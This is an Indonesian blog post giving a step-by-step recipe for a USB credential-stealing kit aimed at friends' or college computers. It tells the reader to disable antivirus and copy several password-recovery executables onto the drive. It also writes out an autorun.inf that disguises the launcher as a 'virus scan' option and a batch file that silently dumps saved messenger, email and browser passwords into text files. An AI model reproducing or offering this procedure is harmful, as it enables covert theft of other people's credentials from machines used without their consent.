Jumat, 25 Maret 2011

0 Cara mendapat kan pasword dari komputer teman yang di simpan melalu Flashdisk


Menggunakan alat-alat dan USB flashdisk Anda dapat membuat rootkit Anda sendiri untuk hack password dari / Komputer kuliah teman Anda. Kita perlu alat-alat berikut untuk membuat rootkit kami.

MessenPass:password dari program yang paling populer Instant Messenger: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger yang disediakan dengan Netscape 7, Trillian, Miranda, dan Gaim.

Mail PassView: password dari program email berikut: Outlook Express, Microsoft Outlook 2000 (POP3 dan SMTP Account saja), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP dan SMTP Account), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Grup Mail Free.Mail PassView juga dapat memulihkan password dari account email berbasis web (Hotmail, Yahoo, Gmail), jika Anda menggunakan program yang terkait account tersebut.

IE PassView: IE PassView adalah utilitas kecil yang mengungkapkan password yang disimpan oleh browser Internet Explorer. Mendukung Internet Explorer 7.0 yang baru, serta versi Internet explorer, v4.0 - v6.0

Protected Storage PassView:semua password yang tersimpan di dalam Penyimpanan Dilindungi, termasuk password AutoComplete Internet Explorer, password situs yang dilindungi sandi, MSN Explorer Sandi, dan banyak lagi ...

PasswordFox: PasswordFox adalah pemulihan alat password kecil yang memungkinkan Anda untuk melihat nama pengguna dan password yang disimpan oleh browser Mozilla Firefox Web. Secara default, PasswordFox menampilkan password yang disimpan dalam profil Anda saat ini, tetapi Anda dapat dengan mudah dapat memilih untuk menonton password profil Firefox lainnya. Untuk setiap entri kata sandi, informasi berikut ini ditampilkan: Rekam Indeks, Web Site, User Name, Password, User Nama Field, Password Field, dan Signons nama file.

Berikut adalah langkah-langkah prosedur untuk membuat toolkit password hacking.

Catatan: Anda harus menonaktifkan sementara Anti-Virus anda sebelum mengikuti langkah ini.

1. Download semua 5 alat, ekstrak file dan copy saja executable (file exe.) Ke dalam USB flashdisk.

yaitu: Salin file - mspass.exe, mailpv.exe, iepv.exe, pspv.exe dan passwordfox.exe ke dalam USB Drive.

2. Buat Notepad baru dan menulis teks berikut ke dalamnya

[Autorun] open AKSI = launch.bat = Lakukan Scan Virus

menyimpan Notepad sebagai autorun.inf

Sekarang salin file autorun.inf ke flashdisk USB anda.

3. Buat yang lain Notepad dan menulis teks berikut ke atasnya.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

menyimpan Notepad sebagai launch.bat

Salin file launch.bat juga untuk drive USB anda.

Sekarang rootkit Anda siap dan Anda siap untuk hack password. Anda dapat menggunakan flashdisk ini pada PC teman Anda atau pada komputer perguruan tinggi Anda. Cukup ikuti langkah-langkah ini

1. Masukkan flashdisk dan jendela autorun akan pop-up. (Ini karena,anda telah menciptakan flashdisk autorun).

2. Pada jendela pop-up, pilih opsi pertama (Melakukan Scan Virus).

3. Sekarang semua tool password hacking diam-diam akan mendapatkan pasword di dalam komputer (proses ini memakan waktu hampir beberapa detik). Mendapatkan password yang disimpan dalam file TXT..

4. Keluarkan flashdisk dan Anda akan melihat password yang disimpan dalam file TXT..

MAAF KALO ADA YANG REPOST

SMOGA BERMANFAAT

0 komentar:

Poskan Komentar

Kalau Comment Jangan Junk Ya

Free Blog Promotion

Untuk mengatur bagaimana tampilan tooltip tersebut nantinya, maka disini memerlukan kode style. Kode yang diperlukan seperti berikut ini.